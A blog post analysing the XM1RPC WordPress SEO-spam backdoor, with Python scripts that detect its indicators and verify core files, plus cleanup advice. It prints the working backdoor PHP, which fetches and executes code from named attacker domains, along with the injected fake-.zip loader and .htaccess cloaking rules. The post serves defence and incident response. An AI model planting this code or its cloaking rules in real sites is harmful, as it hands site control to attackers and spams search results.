Xm1rpc Backdoor WordPress SEO spam hack 2016

11 November 2016

I’ve recently come across an issue on some of our monitored WordPress websites in which malicious code and files have appeared in the root directory of the WordPress installation. The hack is known as the XM1RPC campaign, an SEO spam distribution backdoor.

The hack is identified by the following:

The default WordPress xmlrpc.php file is replaced with xm1rpc.php, which contains code similar to the following:

// Trigger: the backdoor only activates when the query string contains 'simpler-ws'.
$query = isset($_SERVER['QUERY_STRING'])? $_SERVER['QUERY_STRING']: '';
if (false !== strpos($query, 'simpler-ws')) {
    __1get_ws();
    $ws_hash = md5('wsa');
    $cache_dir = __1get_root();
    $ws_file = $cache_dir.'/'.$ws_hash.'.zip';
    // The cached ".zip" is plain PHP and is executed here.
    require($ws_file);
    die('');
}
// Works out the document root from the script paths.
function __1get_root() {
    $localpath=getenv("SCRIPT_NAME");
    $absolutepath=getenv("SCRIPT_FILENAME");
    $root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
    return $root_path;
}
// Fetches the remote payload and caches it as <md5('wsa')>.zip in the web root,
// refreshing it once the cached copy is older than 24 hours.
function __1get_ws() {
    $host = isset($_SERVER['HTTP_HOST'])? $_SERVER['HTTP_HOST']: '';
    $ws_hash = md5('wsa');
    $cache_dir = __1get_root();
    $ws_file = $cache_dir.'/'.$ws_hash.'.zip';
    if (!file_exists($ws_file) || file_exists($ws_file) && (time() - filemtime($ws_file) > 60*60*24*1)) {
        $ws = __1fetch_url(__get_rev().'&get_ws');
        if (!empty($ws)) file_put_contents($ws_file, $ws);
    } else {
        $ws = file_get_contents($ws_file);
    }
    return $ws;
}
// Builds the command-and-control URL; the infected host and requested URL are sent along.
function __get_rev() {
    return 'http://bokoinchina.com/extadult2.php?host='.trim(strtolower($_SERVER['HTTP_HOST']), '.').'&full_url='.urlencode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
    return 'http://nezlobudnya.com/generate';
}
// Downloads a URL with up to three attempts, via cURL or, failing that, allow_url_fopen.
function __1fetch_url($url) {
    $contents = false;
    $errs = 0;
    while ( !$contents && ($errs++ < 3) ) {
        $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';
        if (is_callable('curl_init')) {
            $c = curl_init($url);
            curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE);
            curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($c, CURLOPT_USERAGENT,$user_agent);
            $contents = curl_exec($c);
            if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false;
            curl_close($c);
        } else {
            $allowUrlFopen = preg_match('/1|yes|on|true/i', ini_get('allow_url_fopen'));
            if ($allowUrlFopen) {
                $options = array('http' => array('user_agent' => $user_agent));
                $context = stream_context_create($options);
                $contents = @file_get_contents($url, false, $context);
            }
        }
    }
    return $contents;
}

The xm1rpc.php file acts as a backdoor: when the trigger is present in the query string, it fetches code from attacker-controlled domains such as bokoinchina[.]com and nezlobudnya[.]com, caches it as a .zip file in the web root, and executes it.

The following files are injected with this code, or a close variant of it:

  • wp-include/index.php
  • wp-admin/index.php
  • wp-admin/load.php
  • index.php

// Suppress errors so a missing payload does not reveal the injection, then include the fake ".zip" as PHP.
error_reporting(0);
ini_set("display_errors",0);
$localpath=getenv("SCRIPT_NAME");
$absolutepath=getenv("SCRIPT_FILENAME");
$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));
include_once($root_path."/d730d81e7e1033a51c2bddc5c68874ce.zip");

Inside the .htaccess files, the following rewrite rules (or similar ones) have been added. The first block is the cloaking part of the hack: only requests whose user agent or referrer looks like a search engine are rewritten to index.php, so the spam content is served to crawlers while normal visitors see the regular site.

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^.*$ index.php [L]

RewriteEngine On
RewriteRule ^file\/[a-zA-Z0-9]+\/[0-9]+\/$ file.php [L]

RewriteEngine On
RewriteRule ^([a-zA-Z0-9]+)-(.*)-([0-9]+)\.sql$ file.php?$1=$2-$3 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]

RewriteEngine On
RewriteRule ^kgc\/[a-zA-Z0-9]+\/[0-9]+\/$ kgc.php [L]

RewriteEngine On

A number of encrypted .zip files have been uploaded to the root directory and to wp-include. Despite the .zip extension these are not archives: they contain PHP code, which is executed when the injected include_once statements above load them.

In my case malicious code was added to /wp-includes/load.php, which is a WordPress core file. The injected code is able to create the xm1rpc.php file, which reinfects the .htaccess.
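The indicators above can be checked mechanically. The following Python script is an added example, not code from the original post: it walks a WordPress document root looking for the renamed xm1rpc.php, .zip files in the root or wp-includes that hold PHP source instead of an archive, include/require of a .zip file in the core files listed above, and .htaccess rules that rewrite only search-engine traffic. The infected site it scans is a constructed stand-in built in a temporary directory (the stand-in files carry only the marker strings, not the real payload), and the standard wp-includes/wp-admin layout is assumed.

```python
import os
import re
import tempfile

# Indicators taken from the description above; standard WordPress paths assumed.
CORE_FILES = (
    "index.php",
    "wp-admin/index.php",
    "wp-admin/load.php",
    "wp-includes/index.php",
    "wp-includes/load.php",
)
# include/require of anything ending in .zip: legitimate PHP never includes an archive.
ZIP_INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?[^;]*\.zip['\"]", re.I)
# The query-string trigger and helper names seen in the xm1rpc.php sample.
XM1RPC_MARKERS = re.compile(r"simpler-ws|__1get_ws|__1fetch_url")
# RewriteCond lines that single out search-engine user agents or referrers.
SEO_CLOAK = re.compile(
    r"RewriteCond\s+%\{HTTP_(?:USER_AGENT|REFERER)\}\s+\(?(?:google|yahoo|msn|aol|bing)", re.I
)
ZIP_MAGIC = b"PK\x03\x04"  # a genuine zip archive starts with a local file header


def _read(path):
    with open(path, "rb") as f:
        return f.read()


def scan_wordpress_root(root):
    """Return a sorted list of (relative path, reason) for every indicator found."""
    findings = []

    # 1. the renamed xmlrpc.php
    if os.path.isfile(os.path.join(root, "xm1rpc.php")):
        findings.append(("xm1rpc.php", "renamed xmlrpc backdoor file present"))

    # 2. .zip files in the root or wp-includes that are really PHP source
    for sub in ("", "wp-includes"):
        d = os.path.join(root, sub)
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            path = os.path.join(d, name)
            if not (name.lower().endswith(".zip") and os.path.isfile(path)):
                continue
            data = _read(path)
            if not data.startswith(ZIP_MAGIC) and b"<?php" in data:
                findings.append((os.path.join(sub, name), "zip extension but contains PHP code"))

    # 3. injected loader in the core files (and in xm1rpc.php itself)
    for rel in CORE_FILES + ("xm1rpc.php",):
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            continue
        text = _read(path).decode("utf-8", "replace")
        if ZIP_INCLUDE.search(text):
            findings.append((rel, "includes a .zip file as PHP"))
        if XM1RPC_MARKERS.search(text):
            findings.append((rel, "xm1rpc trigger/helper names present"))

    # 4. cloaking rules in any .htaccess under the root
    for dirpath, _, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            if SEO_CLOAK.search(_read(path).decode("utf-8", "replace")):
                findings.append((os.path.relpath(path, root), "search-engine-only rewrite (cloaking)"))

    return sorted(findings)


def build_sample_site(base):
    """Constructed stand-in for an infected site: marker strings only, not the real malware."""
    def put(rel, data):
        path = os.path.join(base, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as f:
            f.write(data)

    put("wp-admin/index.php", b"<?php\nrequire_once __DIR__ . '/admin.php';\n")  # clean
    put("wp-includes/load.php", b"<?php\nerror_reporting(0);"
        b'include_once($root_path."/d730d81e7e1033a51c2bddc5c68874ce.zip");\n')  # injected
    put("d730d81e7e1033a51c2bddc5c68874ce.zip", b"<?php /* not an archive */ echo 1;\n")
    put("backup.zip", ZIP_MAGIC + b"\x00" * 26)  # a real (empty) zip: must not be flagged
    put("xm1rpc.php", b"<?php // stand-in: if (strpos($query, 'simpler-ws') !== false) { }\n")
    put(".htaccess", b"RewriteEngine On\n"
        b"RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]\n"
        b"RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)\n"
        b"RewriteRule ^.*$ index.php [L]\n")
    return base


def demo():
    return scan_wordpress_root(build_sample_site(tempfile.mkdtemp()))


if __name__ == "__main__":
    for rel, why in demo():
        print(f"{rel}: {why}")
```

Run it against a real document root with `scan_wordpress_root("/path/to/site")`; the genuine backup.zip in the sample is there to show that the check keys on file content rather than on the extension alone.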

How to prevent an xm1rpc.php infection

  • Replace wp-include with a fresh copy from a clean WordPress install.
  • Remove the malicious code from all of the infected files mentioned above.
  • Change the passwords for every account on your WordPress site, and use strong passwords.
  • Avoid hosting several websites under the same shared account: one compromised site can cross-contaminate and infect the other websites on the same server.
  • Update WordPress / the CMS to the latest version and update all plugins.
  • Install a firewall on your website.
  • Check the integrity of your core files using a plugin such as Wordfence.
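Added example (not from the post, and not Wordfence's own code) of the core-file integrity check the last step describes: build a SHA-256 manifest from a clean WordPress tree, then compare a live install against it, reporting modified core files, manifest files that are missing (the replaced xmlrpc.php) and unexpected files in the document root or core directories. Both trees are constructed in temporary directories with stand-in contents; wp-config.php is skipped and wp-content is not walked, because those legitimately differ from a fresh download.

```python
import hashlib
import os
import tempfile

IGNORE = {"wp-config.php"}  # differs per site by design; review it by hand instead


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(clean_root):
    """relative path -> sha256 for every file in a freshly downloaded WordPress tree."""
    manifest = {}
    for dirpath, _, files in os.walk(clean_root):
        for name in files:
            path = os.path.join(dirpath, name)
            manifest[os.path.relpath(path, clean_root)] = sha256_file(path)
    return manifest


def verify_install(live_root, manifest, core_dirs=("wp-admin", "wp-includes")):
    """Compare a live site against the manifest.

    modified: a manifest file whose hash differs; missing: a manifest file that is absent;
    added: a file in the document root or a core directory that the manifest does not know
    (this is where xm1rpc.php and the fake .zip files show up). wp-content is not walked.
    """
    report = {"modified": [], "missing": [], "added": []}
    for rel, digest in manifest.items():
        path = os.path.join(live_root, rel)
        if not os.path.isfile(path):
            report["missing"].append(rel)
        elif sha256_file(path) != digest:
            report["modified"].append(rel)
    for dirpath, dirs, files in os.walk(live_root):
        if dirpath == live_root:
            dirs[:] = [d for d in dirs if d in core_dirs]  # descend only into core dirs
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), live_root)
            if rel not in manifest and rel not in IGNORE:
                report["added"].append(rel)
    return {k: sorted(v) for k, v in report.items()}


def _put(root, rel, data):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(data)


def demo():
    """Constructed clean and infected trees; the infection mirrors the post's description."""
    clean, live = tempfile.mkdtemp(), tempfile.mkdtemp()
    core = {
        "index.php": b"<?php\nrequire __DIR__ . '/wp-blog-header.php';\n",
        "xmlrpc.php": b"<?php\n// XML-RPC endpoint\n",
        "wp-admin/load.php": b"<?php\n// admin helpers\n",
        "wp-includes/load.php": b"<?php\n// core loader\n",
        "wp-includes/index.php": b"<?php\n// Silence is golden.\n",
    }
    for rel, data in core.items():
        _put(clean, rel, data)
        _put(live, rel, data)
    # Stand-in infection: injected loader, renamed xmlrpc, fake .zip, endpoint removed.
    _put(live, "wp-includes/load.php", core["wp-includes/load.php"]
         + b'include_once($root_path."/d730d81e7e1033a51c2bddc5c68874ce.zip");\n')
    _put(live, "xm1rpc.php", b"<?php // stand-in for the backdoor\n")
    _put(live, "wp-includes/d730d81e7e1033a51c2bddc5c68874ce.zip", b"<?php // not an archive\n")
    os.remove(os.path.join(live, "xmlrpc.php"))
    # Legitimate per-site differences that must not be reported.
    _put(live, "wp-config.php", b"<?php define('DB_NAME', 'example');\n")
    _put(live, "wp-content/plugins/example/example.php", b"<?php // plugin code\n")
    return verify_install(live, build_manifest(clean))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

In practice the manifest is built once from a freshly downloaded copy of the exact WordPress version the site runs and stored off the web server, so that an attacker who can write to the document root cannot also rewrite the baseline.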


Article by: Brett
Category : Stories